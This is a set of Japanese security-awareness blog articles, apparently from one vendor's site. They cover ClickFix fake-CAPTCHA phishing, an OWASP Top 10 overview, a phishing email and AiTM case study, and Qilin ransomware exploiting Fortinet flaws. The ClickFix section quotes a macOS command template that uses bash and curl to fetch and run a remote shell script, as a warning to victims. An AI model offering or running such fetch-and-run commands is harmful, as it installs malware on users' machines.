    • 正規のGoogle広告主の広告管理用サービスのアカウントを乗っ取り、マルバタイジングを行う事例 注 6)

    フィッシングと偽CAPTCHA:ClickFixの新手口に注意

    フィッシングやマルバタイジングなどの手法と併用されるものとして、ClickFix偽CAPTCHA(Fake CAPTCHA)という手法があります。ClickFixはもともと、アプリケーションのダウンロードサイトなどを模した偽サイトでエラー画面に模した画面を表示し、被害者にコマンドをコピーアンドペーストさせてマルウェアをダウンロードさせる攻撃です。元は不具合を修正(Fix)するためにコマンドを実行させることからついた名前ですが、もちろん修正すべきものは何もなく、セキュリティ防御のためのシステム(EDRなど)の検知をかいくぐるためにユーザにコマンドを実行させる点に特徴があります。

    ClickFixは単純なコマンドのコピーアンドペーストと実行から、その後偽のCAPTCHAやreCAPTCHA を介してコマンドを実行させるものへと進化しています。CAPTCHA または reCAPTCHA 認証に失敗したと見せかけて、コマンドのコピーアンドペーストと実行手順を表示し、エラーの解消にはこの手順を実行せよとするものです。実行手順にはWindowsであれば必ず Windowsボタン+R(Windowsのファイル名指定実行のショートカット)、macOSユーザであれば/bin/bash -c “$(curl -fsSL リモートのシェルファイルへのパス)”が表示されます。いずれもファイルを実行するための手順となります。これを見たら怪しいと思ってWebページを閉じ、会社のマシンを使っている場合は必ずIT部門に報告しましょう。

    このほかにも宿泊予約サイトに見せかけたClickFix手法も観測されています 注 7)。ダウンロードされるマルウェアは RAT やインフォスティーラーなど各種あり、この手法を悪用する攻撃者も様々です。日本語での事例はあまり見かけませんが、日本に対して過去に攻撃を実行したグループでの悪用例があり、画面の再現や実行手順の翻訳さえ整ってしまえばいつでも実行可能であることから、警戒するに越したことはありません。

    放置ドメインの悪用によるフィッシングリスクと対策

    閉鎖したはずのサブドメインやドメインが侵害され、フィッシングの誘導先やフィッシングメールの送信元として悪用されることもあります。自社のドメインやサブドメインが悪用されていないかの確認を定期的に行い、自社ブランドの価値を維持することも非常に重要です。

    アタックサーフェス調査の詳細については以下の記事をご参照ください。
    ASM(Attack Surface Management)と脆弱性診断

    企業が狙われるビジネスメール詐欺(BEC):フィッシングの延長にある脅威

    ビジネスメール詐欺についてはこちらの記事をご参照ください。
    情報セキュリティ10大脅威」3年連続ベスト3入り、ビジネスメール詐欺を防ぐ手立ては?


    ―第4回「企業が行うべきフィッシング対策」」へ続く―

    【連載一覧】

    第4回「企業が行うべきフィッシング対策」」へ続く―

    ―第1回「ソーシャルエンジニアリングの定義と人という脆弱性」―
    ―第2回「実例で解説!フィッシングメールの手口と対策」―
    ―第4回「企業が行うべきフィッシング対策」」―

    【関連記事】
    【重要】楽天証券・SBI 証券をかたるフィッシングメールにご注意!
    IPA 情報セキュリティ10大脅威からみる―注目が高まる犯罪のビジネス化―
    フィッシングとは?巧妙化する手口とその対策
    「情報セキュリティ 10 大脅威」3 年連続ベスト 3 入り、ビジネスメール詐欺を防ぐ手立ては?

    注:
    1)https://www.bbc.com/news/articles/cq6yznmv3gzo
    2)https://www.keishicho.metro.tokyo.lg.jp/kurashi/tokushu/police_officer.html
    3)https://www.ic3.gov/PSA/2025/PSA250515
    4)https://www.msn.com/en-us/news/us/us-government-is-investigating-messages-impersonating-trumps-chief-of-staff-susie-wiles/ar-AA1FMU7f
    5)https://www.microsoft.com/en-us/security/blog/2025/03/06/malvertising-campaign-leads-to-info-stealers-hosted-on-github/
    6)https://www.malwarebytes.com/blog/news/2025/01/the-great-google-ads-heist-criminals-ransack-advertiser-accounts-via-fake-google-ads
    7)https://www.microsoft.com/en-us/security/blog/2025/03/13/phishing-campaign-impersonates-booking-com-delivers-a-suite-of-credential-stealing-malware/

    Security NEWS TOPに戻る
    バックナンバー TOPに戻る

    ウェビナー開催のお知らせ

  • 2025年7月9日(水)13:00~14:00
    SQAT®ペネトレーションテスト実演付き!-攻撃の“成立”を見極めるペネトレーションテストとは-
  • 2025年7月16日(水)14:00~15:00
    進化するランサムウェア攻撃-国内最新事例から学ぶ!被害を防ぐ実践ポイント10項目を解説-
  • 2025年7月23日(水)14:00~15:00
    急増するフィッシング攻撃の実態と対策〜企業を守る多層防御とは〜
  • 最新情報はこちら


    資料ダウンロードボタン
    年二回発行されるセキュリティトレンドの詳細レポート。BBSecで行われた診断の統計データも掲載。

    お問い合わせボタン
    サービスに関する疑問や質問はこちらからお気軽にお問合せください。


    Security Serviceへのリンクバナー画像

    BBsecコーポレートサイトへのリンクバナー画像

    セキュリティ緊急対応のバナー画像

    2025年7月19日(土)開催
    「Hack Fes. 2025」協賛のお知らせ

    Share

    2025年7月19日(土)に
    開催される「Hack Fes. 2025」に当社が協賛いたします。

    Hack Fes. 2025 概要

    日 時 2025年7月19日(土)
    【カンファレンス】10:00〜17:40(受付開始 9:20)
    【ネットワーキング(NW)パーティ】18:00〜19:40
    (開場 17:30)
    会 場 秋葉原UDX
    募集人数 【カンファレンス】350名(予定)
    参加費(税込) 【カンファレンスのみ】4,000円
    【カンファレンス+NWパーティ】10,000円
    主催・運営 日本ハッカー協会
    協賛企業:株式会社ブロードバンドセキュリティ/SCSKセキュリティ株式会社/株式会社CEL/株式会社ユービーセキュア/フューチャーセキュアウェイブ株式会社/アカマイ・テクノロジーズ合同会社

    詳細および参加申込

    詳細お申込みボタン
    ※外部サイトにリンクします。

    弊社講演概要

    スポンサーセッション:「”w/ AI”, “w/o AI” 2つの世界の光と闇」/齊藤 義人(株式会社ブロードバンドセキュリティ)

    • 14:20 – 14:45(25min)
    • 本講演では、「w/ AI」と「w/o AI」の2つの世界線を行き来しながら、組織が直面する新たなリスクの輪郭を描きます。インシデントが“起こらない”前提ではなく、“起きる”前提で考える時代──ペンテスターであり経営にも関わる立場から、完璧な防御ではなく「しなやかに耐え、素早く立ち直る力(サイバーレジリエンス)」へ。技術・体制・文化、それぞれの変革のヒントをお届けします。

    詳細および参加申込

    詳細お申込みボタン
    ※外部サイトにリンクします。

     皆様のご来場を心よりお待ち申し上げております。

    【第1回】「OWASP Top 10とは?アプリケーションセキュリティの基本を押さえよう」

    Share

    Security NEWS TOPに戻る
    バックナンバー TOPに戻る

    近年、Webアプリケーションを狙ったサイバー攻撃が急増しており、企業にとってWebアプリケーションのセキュリティ強化は欠かせない課題となっています。その中で、世界中のセキュリティ専門家が指標として活用しているのが「OWASP Top 10」です。

    今回は、Webアプリケーションの代表的な脆弱性をまとめた「OWASP Top 10」を通じて、基本的なセキュリティ知識を深め、企業での対策に活かすことを目的とし、背景から各脆弱性カテゴリの説明、実例、対策方法までを全3回のシリーズに分けて解説します。

    OWASPとは

    OWASP(Open Worldwide Application Security Project)は、ソフトウェアのセキュリティ向上を目的とした国際的な非営利団体です。開発者やセキュリティ専門家によって構成されており、セキュリティに関するツールやドキュメントなどを無償で提供しています。OWASPは中立かつオープンな立場から情報を発信しており、多くの企業や政府機関がそのガイドラインを信頼し、採用しています。

    OWASP Top 10とは

    OWASP Top 10は、Webアプリケーションにおける代表的なセキュリティリスクをランキング形式でまとめたもので、最も重要な10の脆弱性カテゴリを示しています。このリストはおよそ3年ごとに更新されており、業界の最新動向や実際の脅威傾向を反映しています。このTop 10は、アプリケーション開発やセキュリティ教育、脆弱性診断の指針として世界中で活用されており、情報システム部門にとってはセキュリティの共通言語ともいえる存在です。

    OWASP Top 10:2021概要

    OWASP Top 10:2021で挙げられているリスクとその概要について、SQAT.jpでは以下の記事でも取り上げています。あわせてぜひご覧ください。
    OWASP Top 10―世界が注目するWebアプリケーションの重大リスクを知る―

    以下は、2021年に発表された最新版のOWASP Top 10のリストです。

    項目番号 リスク名 概要
    A01 Broken Access Control
    (アクセス制御の不備)
    アクセス制御の不備により、本来アクセスできない情報や機能へアクセスされるリスク
    A02 Cryptographic Failures
    (暗号化の不備)
    暗号化の不備による機密情報の漏洩や改ざん
    A03 Injection
    (インジェクション)
    SQLインジェクションなど、外部から不正なコードを注入されるリスク
    A04 Insecure Design
    (セキュアでない設計)
    セキュリティを考慮しない設計により生じる構造的リスク
    A05 Security Misconfiguration
    (セキュリティ設定のミス)
    設定ミスや不要な機能の有効化に起因する脆弱性
    A06 Vulnerable and Outdated Components(脆弱かつ古いコンポーネントの使用) 脆弱性を含む古いライブラリやフレームワークの使用
    A07 Identification and Authentication Failures(識別と認証の不備) 認証処理の不備により、なりすましや権限昇格が発生する
    A08 Software and Data Integrity Failures(ソフトウェアとデータの整合性の不備) ソフトウェア更新やCI/CDの不備により改ざんを許すリスク
    A09 Security Logging and Monitoring Failures(セキュリティログとモニタリングの不備) 侵害の検知・追跡ができないログ監視体制の欠如
    A10 Server-Side Request Forgery (SSRF)(サーバサイドリクエストフォージェリ) サーバが内部リソースにアクセスしてしまうリスク
    出典:OWASP Top 10:2021より弊社和訳

    各リスク項目の代表的な脅威事例

    項目番号 実例企業・事例 概要
    A01 Facebook (2019) 他人の公開プロフィールがIDの推測とAPI操作により取得可能だった*8
    A02 Turkish Citizenship Leak(2016) 暗号化されていなかったデータベースから約5,000万人の個人情報が流出*9
    A03 Heartland Payment Systems (2008) SQLインジェクションにより1億件以上のクレジットカード情報が漏洩*10
    A04 パスワードリセットの仕様不備(複数事例) 多くの中小サイトで、トークンなしにメールアドレス入力のみでリセット可能な設計が確認されている
    A05 Kubernetes Dashboard誤設定事件(Tesla 2018) 管理用インターフェースが公開状態になっており、社内クラウドで仮想通貨マイニングに悪用された*11
    A06 Equifax (2017) 古いApache Strutsの脆弱性(CVE-2017-5638)を放置していたことで1.4億件以上の個人情報が漏洩*12
    A07 GitHub (2012) 認証処理の不備により、セッションを乗っ取られる脆弱性が悪用され、一時的にユーザが他人のリポジトリにアクセス可能に
    A08 SolarWinds サプライチェーン攻撃(2020) 正規のソフトウェアアップデートにマルウェアが仕込まれ、多数の政府機関や企業を含めた組織に影響を与えた
    A09 Capital One (2019) AWS環境の不適切なログ監視により、Web Application Firewallの設定ミスから約1億600万人分の情報が流出*13
    A10 Capital One (同上) SSRF攻撃によりAWSメタデータサービスへリクエストが可能となり、内部資格情報を窃取された*14

    企業はOWASP Top 10をどう活用すべきか

    OWASP Top 10は、単なる「参考資料」ではなく、企業が自社のセキュリティ対策を体系的に見直すための実践的な指針として活用できます。以下に、企業の情報システム部門担当者等が実際に取り入れるべき活用方法を紹介します。

    開発プロセスへの組み込み(セキュア開発)

    アプリケーション開発において、設計段階からOWASP Top 10を参考にすることで、設計段階から脆弱性を防ぐ「セキュア・バイ・デザイン(Secure by Design)」の思想を組み込むことが可能です。とくにA04「Insecure Design」などはアプリケーション開発の初期段階での対策が鍵となります。

    脆弱性診断の評価基準として

    外部のセキュリティ診断会社や自社診断の基準としてOWASP Top 10を採用することで、リスクの見落としを防ぎつつ、業界標準の診断を実現できます。

    セキュリティ教育・啓発資料として

    企業の社員のセキュリティリテラシーを高めるため、開発者・インフラ管理者・経営層を含めたセキュリティ教育プログラムにOWASP Top 10を取り入れることも有効です。定期的な研修やハンズオン形式での演習と組み合わせることで、具体的な攻撃手法や防御策を理解しやすいため、セキュリティ意識の向上につながります。

    OWASP Top 10はセキュリティ対策の出発点

    OWASP Top 10は、Webアプリケーションの開発やセキュリティ対策に取り組む企業にとって、最も基本かつ重要な指標です。サイバー攻撃の多くは、実はこうした「基本的な脆弱性」から発生しており、OWASP Top 10で挙げられているリスクを理解することがリスク低減の第一歩になります。特に情報システム部門や開発チームは、OWASP Top 10を設計・開発・テスト・運用の各フェーズに取り入れ、継続的なセキュリティ対策を行う必要があります。また、社員へのセキュリティ教育や脆弱性診断サービスの評価基準としても有効活用することで、より実効性の高いセキュリティ体制を構築できるでしょう。

    第2回では、API特有の脅威にフォーカスした「OWASP API Security Top 10」をご紹介します。APIを活用している企業にとって、見逃せない内容となっていますので、ぜひあわせてご覧ください。


    ―第2回「OWASP API Security Top 10とは?APIの脅威と対策を知ろう」へ続く―

    【連載一覧】

    ―第2回「OWASP API Security Top 10とは?APIの脅威と対策を知ろう」―
    ―第3回「Non-Human Identities Top 10とは?自動化時代に求められる新しいセキュリティ視点」―

    Security NEWS TOPに戻る
    バックナンバー TOPに戻る


    資料ダウンロードボタン
    年二回発行されるセキュリティトレンドの詳細レポート。BBSecで行われた診断の統計データも掲載。
    お問い合わせボタン
    サービスに関する疑問や質問はこちらからお気軽にお問合せください。

    Security Serviceへのリンクバナー画像
    BBsecコーポレートサイトへのリンクバナー画像
    セキュリティ緊急対応のバナー画像

    ソーシャルエンジニアリング最前線
    【第2回】実例で解説!フィッシングメールの手口と対策

    Share

    Security NEWS TOPに戻る
    バックナンバー TOPに戻る

    本シリーズでは、「ソーシャルエンジニアリング最前線」として、2025年6月現在のフィッシングに代表されるソーシャルエンジニアリングに関する動向と企業・個人が取れる対策をまとめます。第2回はつい先日まで世間を騒がせていたフィッシングメールに関する考察と、メールに含まれるリンクに関する考察、個人でとれる対策をお届けします。

    人の認知機能とフィッシングメール

    第1回の記事にも書いた通り、ソーシャルエンジニアリング攻撃を仕掛けてくる犯罪者は人間の認知機能をついたフィッシングメールを送ってきます。今回は2025年春に問題となった証券口座不正アクセス・取引事件のときに送られてきた一つのフィッシングメールを例に挙げて解説します。

    例からわかるポイントは以下の通りです。

    • A社からのメールを装うことで信頼感を上げようと試みている
      A社は著名な証券会社なため、信頼を獲得し、メールの内容を信じ込ませる(=説得)のに重要な要素となっています
    • A社からのメールであることを冒頭で繰り返すことで、アンカリング効果(最初に提示された情報が以下に正しいか思いこませる効果)を狙っている
      不安感や切迫感を所々で煽ることで認知機能の低下を促します。ここまでで肯定的にフィッシングメールを受け取る被害者に対して、ダメ押しで「よくある質問」を記載することで、確認バイアスを用いて最後の一押しをします

    フィッシングメールに潜む危険:スマホでは見抜けない偽装手法とは

    さて、例の中には3カ所、明らかにA社を騙ったものであることがわかる箇所があります。

    1. 送信元の名称は A 社なのに、B 社の送信専用メールアドレスが送信元として使用されている点
      これはパソコンで閲覧した場合にはすぐにフィッシングだとわかる一つのポイントですが、スマートフォンでは送信元の名称しか表示できないでしょう
    2. A社の正規のURLに見せかけた偽URL
      スマートフォンの性質上、タップしてブラウザで開かない限りURLを確認することはできません。ブラウザで開いた場合でも攻撃者の用意した正規サイトにそっくりなログイン画面か、正規サイトのログイン画面そのものが表示されます
    3. A社の問合せ電話番号を装ったフリーダイヤル
      スマートフォンの場合、ここまでたどり着くのに何回もスワイプする必要があります。ここまでの内容を信じてしまった場合、フリーダイヤルの番号が異なることに気づくことは難しいのではないでしょうか

    メールヘッダ情報で見抜くフィッシングメール

    この他にもスマートフォンで確認するのが難しいフィッシングメールの正体に関連する情報があります。それはメールのヘッダ情報です。先ほど例に挙げたメールのヘッダ情報はこちらです。

    Dmarc-SenderPolicy: reject
    Authentication-Results-Original: (メールサービス); spf=pass
    smtp.mailfrom=admin@(攻撃者が利用するドメイン); dkim=none header.d= header.b=; dmarc=fail
    header.from=(B社のドメイン)

    攻撃者が利用するドメインはトップレベルドメインの時点で B 社のドメインと異なるドメイン、つまりなりすましを行っていることがわかります。詳しく説明すると、下記のようになります。

    • Dmarc-SenderPolicy: reject
      B社のDMARCレコード上、なりすましを拒否するよう指定されていることを明示
    • Authentication-Results-Original: (メールサービス); spf=pass
      攻撃者のドメインのSPFレコードが参照され、PASSしている
    • dkim=none header.d= header.n=
      攻撃者側にDKIMの署名がない
    • DMARC= fail header.from(B 社のドメイン)
      B社のDMARC レコードに問題があるわけではなく、DMARCポリシーを参照したうえでなりすましなのでfail

    【用語解説】
    DMARC(Domain-based Message Authentication, Reporting, and Conformance)…メールソフトで表示されるメールアドレスで検証する技術の一つ。日本国内は導入が滞っている組織が多い
    SPF(Sender Policy Framework)…送信ドメイン認証の一つ。正規のサーバ/IPアドレスからの送信かどうかを検証するもの。ただし一部のなりすまし送信は検出せずPASSしてしまう
    DKIM(DomainKeys Identified Mail)…署名対象の情報を検証する認証技術の一つ。ただし署名に使うドメインの指定が可能なため、単体での検証の回避が可能

    未だにDMARCの実装が滞っている組織が多い関係で、SPF PASSで受信できるようポリシー設定が行われている場合が多く、これがこのメールの受信につながったとも考えられます。なお、この場合、B社には一切の通信が行われないため、B社でリアルタイムになりすましの悪用(ひいては自社のブランドイメージの毀損)に気付くことは困難です。DMARC認証を実装されている企業のはずなので、あとから「RUAレポート」と呼ばれる認証失敗のレポートでお気付きになるかもしれませんが、おそらく数多くのなりすましの被害に遭われているため、RUAレポートを確認して対策を行うのも非常に難しいのではないかと考えられます。

    次に、この攻撃者が使っているインフラを調べてみましょう。攻撃者が利用しているドメインでは評価スコアが検索できないため、送信元のIPアドレスで評価を確認しました。すると、とあるクラウドサービス事業者にたどり着きました。クラウドサービス事業者のインフラ上でWebページなどを公開している場合はWebページのコンテンツからサービスのカテゴリがわかることもありますが、コンテンツはどうやら存在しないようです。Whois 注 1)への登録がないこともわかりました。評価スコアをドメイン名で検索できなかったのはこれが原因でしょう。また、DNS lookup 注 2)も正引き・逆引きともに正しく動作していないことがわかっています。このIPアドレスを通して送信されているメールは27のIPアドレスからのメールのようで、2025年5月は主にゴールデンウィーク明け以降、5月末まで送信があったようですが、2025年6月はどのIPアドレスからもメールが送信されていないようでした。ただし、このIPアドレス群の評価スコアは中立または良好となっているため、攻撃が再開した際に再び悪用される可能性もあります。

    ここまででわかったことをまとめると以下の通りです。

    • スマートフォンで確認することが難しいメールのヘッダ情報には攻撃者の情報が含まれています
    • 一見B社のメールアドレスからの送信のように見えますが、実際はなりすましメールであり、B社がなりすましの悪用に気付くことは困難です
    • B社はDMARCの実装を行っている分、ある意味B社も被害者といえるでしょう
    • 攻撃者はクラウドサービスを利用することで攻撃インフラの流動性を高めている可能性があります
    • 金融庁の2025年6月5日付発表資料では、すでに不正アクセス件数は減少傾向に転じている 注 3)ことから、このIPアドレス群からのフィッシングメールの送信はいったんは止まる可能性が高いと考えられますが、今後の再悪用の可能性は否定できません。

    フィッシングメールに使われる偽リンクの見分け方とは

    次に本文内のリンクです。本文内のリンクはA社のオンラインサービスのログインページに見せかけたURLになっていますが、実際はC社の偽のログイン画面が表示されるようになっていました。ここで注意が必要なのは以下の2点です。

    1. 攻撃者は C 社のログイン画面偽装するか、をブラウザ上に表示することができます
    2. 現状、多くの証券会社が実装しているログイン方法であれば、攻撃者はログイン情報をすべて取得できるようになっています

    この手法は攻撃者中間攻撃(Attacker in the Middle、略称 AiTM)と呼ばれるもので、パスワードのみの認証はもちろん、多要素認証が有効な場合でもSMSやAuthenticatorアプリの利用であれば、時間ベースのワンタイムパスワード(TOTP)に加えてC社のサービスへのアクセスに使用するセッション情報も盗み取るものです。

    攻撃者中間攻撃(AiTM)の仕組み

    AiTMは被害者のふりをして C 社のサービスへのアクセスに必要な情報を盗み取ったうえで、不正アクセスを行います。この際、Authenticator アプリや SMS 認証がAiTMに対して脆弱であるのは、認証の成功がセッション情報(セッションクッキーやトークン)に紐づくところにあります。

    サービスによってはセッションを盗用されたところで大した被害は出ないケースもありますが、経済的に大きな打撃をユーザにもたらす可能性があるサービスについては、リスク管理の観点からもAiTMに耐性のある認証方式 注 4)注 5)の実装が求められるところです。

    ブロードバンドセキュリティ(BBSec)ではAiTMのモデルをもとにしたペネトレーションテストなども承っています。

    今回のケースでは不幸中の幸い?でA社のメールアドレスのなりすましではなくB社のメールアドレスのなりすまし、かつA社のサイトへのAiTMではなくC社のサービスへのAiTMだったため、ログインの前に気付かれたケースも多いのではないかと思います。しかし、A社のログイン画面、A社のメールアドレスのなりすましの場合であれば、最初に提示された情報から信頼度は揺るぐことがなく、多くの人が被害に遭った可能性も高いのではないでしょうか。

    フィッシングメールが仕掛けるマルウェア感染のリスク

    今回例に挙げたフィッシングメールは偽サイトへの誘導目的のフィッシングメールでしたが、未だにマルウェアのダウンロードを目的としたフィッシングメールも盛んに送られています。マルウェアの展開を目的としている場合、以下の3種類の経路が考えられます 注 6)

    1. メールへの添付ファイル経由
    2. リンク経由
      昨今見られるのはオンラインストレージ経由のものやマルバタイジングと呼ばれる悪意ある広告経由のものです
    3. SNSアカウントやGitHubのレポジトリなどの会社外のチャンネル経由
      例として北朝鮮を背景とするサイバー攻撃グループ「TraderTraitor」による暗号資産関連事業者へのサイバー攻撃 注 7)が挙げられます

    個人でできるフィッシングメールの基本的な対策

    フィッシング対策協議会では個人ユーザ向けに日ごろの習慣でフィッシングを回避するよう呼び掛けています 注 8)

    いつもの公式アプリ、いつもの公式サイト(ブックマーク)からのログインを

    第1回の記事でも取り上げたように、何よりも効果的な対策は無意識のレベルで安全な行動が習慣となっていることです。ログインをするときは必ず公式アプリ、公式サイト(ブックマーク)からのログインをお願いします。また特に焦っているとき、注意力が落ちているときにはフィッシングメールの罠にかかりやすいので、いったんメールを閉じて処理の手を止めるのが良いでしょう。


    ―第3回「フィッシングメールの最新トレンドとソーシャルエンジニアリング攻撃の手口」へ続く―

    【連載一覧】

    ―第1回「ソーシャルエンジニアリングの定義と人という脆弱性」―
    ―第3回「フィッシングメールの最新トレンドとソーシャルエンジニアリング攻撃の手口」―
    ―第4回「企業が行うべきフィッシング対策」」―

    【関連記事】
    【重要】楽天証券・SBI 証券をかたるフィッシングメールにご注意!
    IPA 情報セキュリティ10大脅威からみる―注目が高まる犯罪のビジネス化―
    フィッシングとは?巧妙化する手口とその対策
    「情報セキュリティ 10 大脅威」3 年連続ベスト 3 入り、ビジネスメール詐欺を防ぐ手立ては?

    注:
    1) IP アドレス・ドメイン名などの所有者の検索サービスおよびプロトコルを指します。
    2) ドメイン名と IP アドレスを紐づけ得るための DNS サーバへの問合せを行うことを指します。正引き(ドメイン名から IP アドレスを問合せる)と逆引き(IP アドレスからドメイン名を問い合わせる)があります。
    3) 金融庁「インターネット取引サービスへの不正アクセス・不正取引による被害が急増しています」(2025年6月6日閲覧),不正取引・不正アクセスに関する統計情報の表を参照
    4) 米国NIST「SP 800-63B」では認証のレベルがAAL1から3まで定義されている。NIST「SP800-63」では提供するサービスの内容やリスクといったものと照らし合わせて身元保証・認証・フェデレーションのレベルを選択することが推奨されています。
    5) 例えばパスキーやFIDO2対応のハードウェアキーのようにWebサイトのドメインと認証デバイスの紐づけにより、偽サイトでのログインが防止されるものを指します。(第3回記事で詳述します。)
    6) MITRE&ATTCK,Spearphishing Service,Spearphishing Attachment, Spearphishing Linkを参照。
    7) 警察庁「北朝鮮を背景とするサイバー攻撃グループ TraderTraitor による暗号資産関連事業者を標的としたサイバー攻撃について」(2024年12月24日公開)株式会社Ginco「当社サービスへのサイバー攻撃に関するご報告」(2025年1月28日公開)
    8) フィッシング対策協議会,フィッシングとはより

    Security NEWS TOPに戻る
    バックナンバー TOPに戻る

    ウェビナー開催のお知らせ

  • 2025年7月2日(水)13:00~14:00
    いまWeb担当者が知るべきプライバシー対応と情報セキュリティ-プライバシー保護規制と進化するサイバー攻撃手法への対応-
  • 2025年7月16日(水)14:00~15:00
    進化するランサムウェア攻撃-国内最新事例から学ぶ!被害を防ぐ実践ポイント10項目を解説-
  • 2025年7月23日(水)14:00~15:00
    急増するフィッシング攻撃の実態と対策〜企業を守る多層防御とは〜
  • 最新情報はこちら


    資料ダウンロードボタン
    年二回発行されるセキュリティトレンドの詳細レポート。BBSecで行われた診断の統計データも掲載。

    お問い合わせボタン
    サービスに関する疑問や質問はこちらからお気軽にお問合せください。


    Security Serviceへのリンクバナー画像

    BBsecコーポレートサイトへのリンクバナー画像

    セキュリティ緊急対応のバナー画像

    Qilinランサムウェア攻撃の実態と対策:Fortinet脆弱性の悪用を解説

    Share

    Security NEWS TOPに戻る
    バックナンバー TOPに戻る

    昨今、Qilin(キリン)ランサムウェアによる攻撃が世界中で大きな話題となっています。特にFortinet製のネットワーク機器を標的とした攻撃は、企業や公共機関に甚大な被害をもたらしており、セキュリティ業界では警戒感が高まっています。本記事では、Qilinの攻撃手法や被害事例、そして企業が今すぐ取り組むべき対策について、詳しく解説します。

    お問い合わせ

    お問い合わせはこちらからお願いします。後ほど、担当者よりご連絡いたします。

    世界中で猛威を振るうランサムウェアグループQilinの概要と被害事例

    Qilinは2022年8月ごろから活動を開始したとされる脅威グループで、Fortinet製品の複数の重大な脆弱性を悪用して侵入を試みます。Bleeping Computerの最新報道によれば、2025年6月時点で310件以上の被害がダークウェブ上のリークサイトで公表されているとのことです。被害を受けた組織の中には、中国の自動車部品大手や米国の出版大手、豪州の裁判所サービス局など、グローバルに名だたる企業や機関が名を連ねています。

    英国における医療機関への攻撃と社会的影響

    特に注目すべきは、英国の病理検査機関への攻撃でしょう。この事件では、ロンドンの主要なNHS病院にも影響が及び、数百件の診療や手術が中止に追い込まれました。医療現場が機能不全に陥る事態は社会全体に大きな衝撃を与え、ランサムウェア攻撃が単なるIT問題ではなく、人命や社会インフラにも直結する深刻な脅威であることを改めて浮き彫りにしました。

    Qilinが悪用するFortinet脆弱性の詳細

    PRODAFT Flash Alertの報告によれば、主にCVE-2024-21762およびCVE-2024-55591というFortiOSやFortiProxyの重大な脆弱性が悪用されています。これらの脆弱性は、CVSSスコアが9.6と極めて高く、米国CISAも「既知の悪用された脆弱性カタログ(KEV)」に追加し、連邦機関に対策を義務付けています。CVE-2024-21762は2025年2月に修正パッチが提供されていますが、The Shadowserver Foundationの調査によれば、未だに約15万台のデバイスが脆弱なまま運用されているという現状があります。

    Qilinの攻撃手法と特徴

    攻撃手法としては、FortiGateファイアウォールの脆弱性を突いて侵入し、部分的に自動化されたランサムウェア攻撃を展開するのが特徴です。Bleeping Computerの記事によれば、Qilinはスペイン語圏の組織を中心に攻撃を仕掛けているものの、今後は地域を問わず拡大する可能性が高いとされています。

    日本国内での動向と匿名化された被害事例

    日本国内でもQilinグループが、ある医療機関や製造業企業への攻撃をダークウェブ上で主張しているとの情報があります。公式な被害報告は現時点で確認されていませんが、今後も注意が必要です。なお、当該企業名はプライバシー保護の観点から匿名とさせていただきます。

    企業が今すぐ取り組むべき対策

    こうした状況を踏まえ、企業や組織が今すぐ取り組むべき対策について考えてみましょう。まずは、既知の脆弱性に対するパッチ適用を徹底することが最優先です。パッチ適用が遅れるほど、攻撃リスクが高まることは言うまでもありません。さらに、定期的なセキュリティ評価やネットワークの見直し、サプライチェーン全体のセキュリティ強化も欠かせません。CISAやThe Shadowserver Foundationが警告しているように、最新の脅威情報の収集と共有も重要です。

    まとめ:Qilinランサムウェア攻撃の教訓と今後の展望

    最後に、Qilinランサムウェア攻撃の教訓として、「パッチ適用の徹底」「セキュリティ評価の定期的な実施」「サプライチェーン全体のセキュリティ強化」の3つが企業にとって不可欠な対策であることを強調しておきます。AIや自動化技術の進化によって攻撃手法も高度化している今、企業は常に最新の脅威情報をキャッチアップし、自社のセキュリティ体制を見直す姿勢が求められています。

    【参考情報】

  • Bleeping Computer
    https://www.bleepingcomputer.com/news/security/critical-fortinet-flaws-now-exploited-in-qilin-ransomware-attacks/
    https://www.bleepingcomputer.com/tag/fortinet/
  • PRODAFT Flash Alert
    https://industrialcyber.co/ransomware/forescout-details-superblack-ransomware-exploiting-critical-fortinet-vulnerabilities/
    https://www.cybersecuritydive.com/news/superblack-ransomware-used-to-exploit-fortinet-vulnerabilities/742578/
  • CISA(既知の悪用された脆弱性カタログ)
    https://www.cisa.gov/known-exploited-vulnerabilities-catalog
  • Security NEWS TOPに戻る
    バックナンバー TOPに戻る

    ウェビナー開催のお知らせ

  • 2025年6月25日(水)13:00~14:00
    リモートワークの落とし穴を塞ぐ!セキュリティ情報の効率的な収集法&対策のポイント
  • 2025年7月2日(水)13:00~14:00
    いまWeb担当者が知るべきプライバシー対応と情報セキュリティ-プライバシー保護規制と進化するサイバー攻撃手法への対応-
  • 2025年7月16日(水)14:00~15:00
    進化するランサムウェア攻撃-国内最新事例から学ぶ!被害を防ぐ実践ポイント10項目を解説-
  • 最新情報はこちら


    資料ダウンロードボタン
    年二回発行されるセキュリティトレンドの詳細レポート。BBSecで行われた診断の統計データも掲載。

    お問い合わせボタン
    サービスに関する疑問や質問はこちらからお気軽にお問合せください。


    Security Serviceへのリンクバナー画像

    BBsecコーポレートサイトへのリンクバナー画像

    セキュリティ緊急対応のバナー画像

    ソーシャルエンジニアリング最前線
    【第1回】ソーシャルエンジニアリングの定義と人という脆弱性

    Share

    Security NEWS TOPに戻る
    バックナンバー TOPに戻る

    本シリーズでは、「ソーシャルエンジニアリング最前線」として、2025年6月現在のフィッシングに代表されるソーシャルエンジニアリングに関する動向と企業・個人が取れる対策をまとめます。第1回はソーシャルエンジニアリングの簡単な定義と、ソーシャルエンジニアリングで悪用される「人」にまつわる脆弱性をご紹介します。

    関連記事はSQAT.jpで公開中!こちらからご覧ください。
    ソーシャルエンジニアリングとは?その手法と対策

    ソーシャルエンジニアリングの定義

    ソーシャルエンジニアリングは人間の心理や認知機能を悪用したハッキングの技法を指します。よく知られている手法にはフィッシングがありますが、このほかにも様々な手法があります(第3回で詳述します)。

    人という脆弱性

    ソーシャルエンジニアリングが成立する背景には人間の心理や認知機能の問題や属性による前提知識といった人間固有の脆弱性があります。

    認知機能に関連する脆弱性

    皆さんはこんな状態になったことはありませんか?

    • 一点に注意が集中してしまい、周囲の情報を見落とす状態
      多くの人がいる中で待ち合わせをしていて、待ち合わせの相手を探すことに集中した結果、別の知り合いから声を掛けられたことに気付かなかったことはないでしょうか。こういった状態はほかのときでも起こる可能性があります
    • 複雑な作業を行う、大量の情報を処理するといったときについうっかり何かを見逃してしまう状態
      一点集中の場合と似ていますが、処理の複雑性や情報の量との因果関係もあります
    • 過大なストレスがかかったときに注意が緩んでしまう状態
      例えば身内の不幸や自身の病気の発覚など、心的ストレスがかかる状態のときに注意が緩んでしまうことはあるのではないでしょうか

    こういったときにソーシャルエンジニアリング攻撃の犠牲になりやすいといわれています。

    「認知バイアス」という脆弱性

